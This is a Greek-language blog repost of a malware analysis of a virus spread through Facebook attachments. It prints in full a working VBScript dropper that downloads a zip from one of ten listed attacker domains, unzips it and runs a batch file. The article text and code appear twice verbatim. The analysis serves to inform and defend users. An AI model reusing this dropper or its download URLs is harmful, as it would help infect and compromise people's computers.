Πριν μερικές ημέρες και πρώτοι από όλους, οι φίλοι μας στην γνωστή
ιστοσελίδα www.safer-internet.gr μας απέστειλαν το δείγμα από έναν νέο ιό που κυκλοφορούσε στο Facebook και είχε περιέλθει σε γνώση τους...
Συγκεκριμένα όπως ανέφερε η σχετική ενημέρωση, ο εν λόγω ιός διαδιδόταν μέσω χρηστών του Facebook, με επισυναπτόμενα αρχεία Ελληνικής ονοματοθεσίας, κάτι που μας κίνησε εξαρχής ιδιαιτέρως την περιέργεια! Σύμφωνα με αναφορές των συνεργατών μας στο www.safer-internet.gr δεκάδες χρήστες έχουν πέσει θύματα της επίθεσης και κάνεις δεν έχει προβεί σε ενημέρωση για τον τρόπο αποπομπής του κακόβουλου λογισμικού, μη μπορώντας να γνωρίζουν τι ακριβώς κάνει! Ο ρυθμός διάδοσης του ιού, σύμφωνα με ασφαλέστατες πληροφορίες είναι 12 χρήστες εντός 5 λεπτών!!!
Πως ξεκινά η επίθεση
Το θύμα λάμβανε ένα ή περισσότερα μηνύματα φαινομενικά προερχόμενα από φίλους του με επισυναπτόμενα αρχεία ή/και συνδέσμους link με υποτιθέμενο ενδιαφέρον περιεχόμενο. Σε διαρκή επικοινωνία που είχαμε με τους διαχειριστές της ιστοσελίδας www.safer-internet.gr έφτασε στα χέρια μας ο σχετικός σύνδεσμος της επίθεσης, Screenshots του οποίου μπορείτε να δείτε παρακάτω.Η τεχνική ομάδα του SecNews αλλά και εξωτερικοί υποστηρικτές-ερευνητές ασφάλειας (ευχαριστούμε θερμά των ερευνητή ασφάλειας MCMC), πραγματοποιήσαν μια πολύωρη ανάλυση του κακόβουλου λογισμικού, την οποία και παραθέτουμε μαζί με τα συμπεράσματα που προέκυψαν. Σημείωση: Τα ονόματα που αναφέρουμε μπορεί να διαφέρουν μιας και παρατηρήθηκαν διαφορετικές versions του κακόβουλου λογισμικού με την ίδια όμως λειτουργικότητα!
Πρώτο επίπεδο επίθεσης (1st stage)
Μόλις ο ανυποψίαστος χρήστης πραγματοποιήσει λήψη του συμπιεσμένου αρχείου (.rar) με το “ενδιαφέρον” υποτιθέμενο περιεχόμενο, δεν παρατηρεί τίποτα το παράδοξο. Εντός αυτό βρίσκεται το αρχείο “Δες Το!!!.vbs” (visual basic script). Το αρχείο έχει τις παρακάτω εντολές:
Dim oFSO
Set oFSO = CreateObject(“Scripting.FileSystemObject”)
Dim csPATH : csPATH = CreateObject(“WScript.Shell”).ExpandEnvironmentStrings(“%SYSTEMDRIVE%”)
csPATH = csPATH & “\MyFolderakis”
‘ Create a new folder
oFSO.CreateFolder csPATH
Do
download(csPATH)
Unzip csPATH &”\content.zip”, csPATH
Loop While ReportFileStatus(csPATH &”\sapsalo.jar”)=0
Function download(csPATH)
link=RandomLink()
dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)
dim bStrm: Set bStrm = createobject(“Adodb.Stream”)
xHttp.Open “GET”, link, False
xHttp.Send
with bStrm
.type = 1 ‘//binary
.open
.write xHttp.responseBody
.savetofile csPATH &”\content.zip”, 2 ‘//overwrite
end with
download = csPATH &”\content.zip”
End Function
Function ReportFileStatus(filespec)
Dim fso, msg
Set fso = CreateObject(“Scripting.FileSystemObject”)
If (fso.FileExists(filespec)) Then
msg = 1
Else
msg = 0
End If
ReportFileStatus = msg
End Function
Function RandomLink()
sites=Array(“http://xionobala.com/mermikia/moisis.zip”,”http://trendvidz.com/terlix/filezilla.zip”,
“http://tromeroi.com/download/adobe.zip”,”http://womfashion.com/aladin/aladin.zip”,
“http://yoodot.com/ouzo/gnome.zip”,”http://pepperstonix.com/koitatiegine/tikale.zip”,
“http://spatareporo.com/deitetous/simerastonaplha.zip”,
“http://fashionofheart.com/vasika/kalisperasas.zip”,
“http://masterolious.com/mozilla/firefox.zip”,”http://pentorali.com/safe/internet.zip”)
Dim max,min
max=UBound(sites)
min=LBound(sites)
Randomize
a=Int((max-min+1)*Rnd+min)
RandomLink = sites(a)
End Function
Sub Unzip(sSource, sTargetDir)
Set oFSO = CreateObject(“Scripting.FileSystemObject”)
if not oFSO.FolderExists(sTargetDir) then oFSO.CreateFolder(sTargetDir)
Set oShell = CreateObject(“Shell.Application”)
Set oSource = oShell.NameSpace(sSource).Items()
Set oTarget = oShell.NameSpace(sTargetDir)
oTarget.CopyHere oSource, 256
End Sub
Set WshShell = CreateObject(“WScript.Shell”)
WshShell.RUN “cmd /c “& csPATH &”\run.bat” , 2
Πατώντας “klik” στο Δες Τo!!!.vbs για να δεί το υποτιθέμενο ενδιαφέρον αρχείο, πραγματοποιείτε λήψη πρόσθετου λογισμικού από ιστοσελίδα των hackers. Με αυτό τον τρόπο επιτυγχάνουν τον μη εντοπισμό του κακόβουλου λογισμικού από τα antivirus/antimalware, μιας και το VBScript είναι αρχείο κειμένου, που χρησιμοποιεί νόμιμες εντολές των Windows για λήψη αρχείων. Όλα τα πρόσθετα αρχεία τοποθετούντε στον φάκελο “MyFolderakis”, κατεβάζοντας από το flappy-facebook.com. Άρα:
Κατεβάζει από ιστοσελίδες που διαθέτουν οι hackers ένα zip αρχείο.Όλα περιέχουν την ίδια backdoor αλλά έχουν διαφορετικά ονόματα για αποπροσανατολισμό.
H λήψη πραγματοποιείται από μία από τις 10 τυχαίες IP διευθύνσεις ιστοσελίδων που έχουν δημιουργήσει γιαυτό το σκοπό οι hackers.
Αποσυμπιέζει το αρχείο, ελέγχοντας αν αποσυμπιέστηκε επιτυχώς το κύριο αρχείο-malware
Εκτελεί το run.bat
Το αρχείο που λαμβάνετε είναι το content.zip. Έτσι η επίθεση προχωράει επιτυχώς στην δεύτερη φάση.
Δεύτερο επίπεδο επίθεσης (2nd stage)
Έχουμε περάσει στο δεύτερο στάδιο της επίθεσης όπου τα αρχεία έχουν τοποθετηθεί εν αγνοία του χρήστη στον υπολογιστή του.
Πηγή
ιστοσελίδα www.safer-internet.gr μας απέστειλαν το δείγμα από έναν νέο ιό που κυκλοφορούσε στο Facebook και είχε περιέλθει σε γνώση τους...
Συγκεκριμένα όπως ανέφερε η σχετική ενημέρωση, ο εν λόγω ιός διαδιδόταν μέσω χρηστών του Facebook, με επισυναπτόμενα αρχεία Ελληνικής ονοματοθεσίας, κάτι που μας κίνησε εξαρχής ιδιαιτέρως την περιέργεια! Σύμφωνα με αναφορές των συνεργατών μας στο www.safer-internet.gr δεκάδες χρήστες έχουν πέσει θύματα της επίθεσης και κάνεις δεν έχει προβεί σε ενημέρωση για τον τρόπο αποπομπής του κακόβουλου λογισμικού, μη μπορώντας να γνωρίζουν τι ακριβώς κάνει! Ο ρυθμός διάδοσης του ιού, σύμφωνα με ασφαλέστατες πληροφορίες είναι 12 χρήστες εντός 5 λεπτών!!!
Πως ξεκινά η επίθεση
Το θύμα λάμβανε ένα ή περισσότερα μηνύματα φαινομενικά προερχόμενα από φίλους του με επισυναπτόμενα αρχεία ή/και συνδέσμους link με υποτιθέμενο ενδιαφέρον περιεχόμενο. Σε διαρκή επικοινωνία που είχαμε με τους διαχειριστές της ιστοσελίδας www.safer-internet.gr έφτασε στα χέρια μας ο σχετικός σύνδεσμος της επίθεσης, Screenshots του οποίου μπορείτε να δείτε παρακάτω.Η τεχνική ομάδα του SecNews αλλά και εξωτερικοί υποστηρικτές-ερευνητές ασφάλειας (ευχαριστούμε θερμά των ερευνητή ασφάλειας MCMC), πραγματοποιήσαν μια πολύωρη ανάλυση του κακόβουλου λογισμικού, την οποία και παραθέτουμε μαζί με τα συμπεράσματα που προέκυψαν. Σημείωση: Τα ονόματα που αναφέρουμε μπορεί να διαφέρουν μιας και παρατηρήθηκαν διαφορετικές versions του κακόβουλου λογισμικού με την ίδια όμως λειτουργικότητα!
Πρώτο επίπεδο επίθεσης (1st stage)
Μόλις ο ανυποψίαστος χρήστης πραγματοποιήσει λήψη του συμπιεσμένου αρχείου (.rar) με το “ενδιαφέρον” υποτιθέμενο περιεχόμενο, δεν παρατηρεί τίποτα το παράδοξο. Εντός αυτό βρίσκεται το αρχείο “Δες Το!!!.vbs” (visual basic script). Το αρχείο έχει τις παρακάτω εντολές:
Dim oFSO
Set oFSO = CreateObject(“Scripting.FileSystemObject”)
Dim csPATH : csPATH = CreateObject(“WScript.Shell”).ExpandEnvironmentStrings(“%SYSTEMDRIVE%”)
csPATH = csPATH & “\MyFolderakis”
‘ Create a new folder
oFSO.CreateFolder csPATH
Do
download(csPATH)
Unzip csPATH &”\content.zip”, csPATH
Loop While ReportFileStatus(csPATH &”\sapsalo.jar”)=0
Function download(csPATH)
link=RandomLink()
dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)
dim bStrm: Set bStrm = createobject(“Adodb.Stream”)
xHttp.Open “GET”, link, False
xHttp.Send
with bStrm
.type = 1 ‘//binary
.open
.write xHttp.responseBody
.savetofile csPATH &”\content.zip”, 2 ‘//overwrite
end with
download = csPATH &”\content.zip”
End Function
Function ReportFileStatus(filespec)
Dim fso, msg
Set fso = CreateObject(“Scripting.FileSystemObject”)
If (fso.FileExists(filespec)) Then
msg = 1
Else
msg = 0
End If
ReportFileStatus = msg
End Function
Function RandomLink()
sites=Array(“http://xionobala.com/mermikia/moisis.zip”,”http://trendvidz.com/terlix/filezilla.zip”,
“http://tromeroi.com/download/adobe.zip”,”http://womfashion.com/aladin/aladin.zip”,
“http://yoodot.com/ouzo/gnome.zip”,”http://pepperstonix.com/koitatiegine/tikale.zip”,
“http://spatareporo.com/deitetous/simerastonaplha.zip”,
“http://fashionofheart.com/vasika/kalisperasas.zip”,
“http://masterolious.com/mozilla/firefox.zip”,”http://pentorali.com/safe/internet.zip”)
Dim max,min
max=UBound(sites)
min=LBound(sites)
Randomize
a=Int((max-min+1)*Rnd+min)
RandomLink = sites(a)
End Function
Sub Unzip(sSource, sTargetDir)
Set oFSO = CreateObject(“Scripting.FileSystemObject”)
if not oFSO.FolderExists(sTargetDir) then oFSO.CreateFolder(sTargetDir)
Set oShell = CreateObject(“Shell.Application”)
Set oSource = oShell.NameSpace(sSource).Items()
Set oTarget = oShell.NameSpace(sTargetDir)
oTarget.CopyHere oSource, 256
End Sub
Set WshShell = CreateObject(“WScript.Shell”)
WshShell.RUN “cmd /c “& csPATH &”\run.bat” , 2
Πατώντας “klik” στο Δες Τo!!!.vbs για να δεί το υποτιθέμενο ενδιαφέρον αρχείο, πραγματοποιείτε λήψη πρόσθετου λογισμικού από ιστοσελίδα των hackers. Με αυτό τον τρόπο επιτυγχάνουν τον μη εντοπισμό του κακόβουλου λογισμικού από τα antivirus/antimalware, μιας και το VBScript είναι αρχείο κειμένου, που χρησιμοποιεί νόμιμες εντολές των Windows για λήψη αρχείων. Όλα τα πρόσθετα αρχεία τοποθετούντε στον φάκελο “MyFolderakis”, κατεβάζοντας από το flappy-facebook.com. Άρα:
Κατεβάζει από ιστοσελίδες που διαθέτουν οι hackers ένα zip αρχείο.Όλα περιέχουν την ίδια backdoor αλλά έχουν διαφορετικά ονόματα για αποπροσανατολισμό.
H λήψη πραγματοποιείται από μία από τις 10 τυχαίες IP διευθύνσεις ιστοσελίδων που έχουν δημιουργήσει γιαυτό το σκοπό οι hackers.
Αποσυμπιέζει το αρχείο, ελέγχοντας αν αποσυμπιέστηκε επιτυχώς το κύριο αρχείο-malware
Εκτελεί το run.bat
Το αρχείο που λαμβάνετε είναι το content.zip. Έτσι η επίθεση προχωράει επιτυχώς στην δεύτερη φάση.
Δεύτερο επίπεδο επίθεσης (2nd stage)
Έχουμε περάσει στο δεύτερο στάδιο της επίθεσης όπου τα αρχεία έχουν τοποθετηθεί εν αγνοία του χρήστη στον υπολογιστή του.
Πηγή
Δεν υπάρχουν σχόλια:
Δημοσίευση σχολίου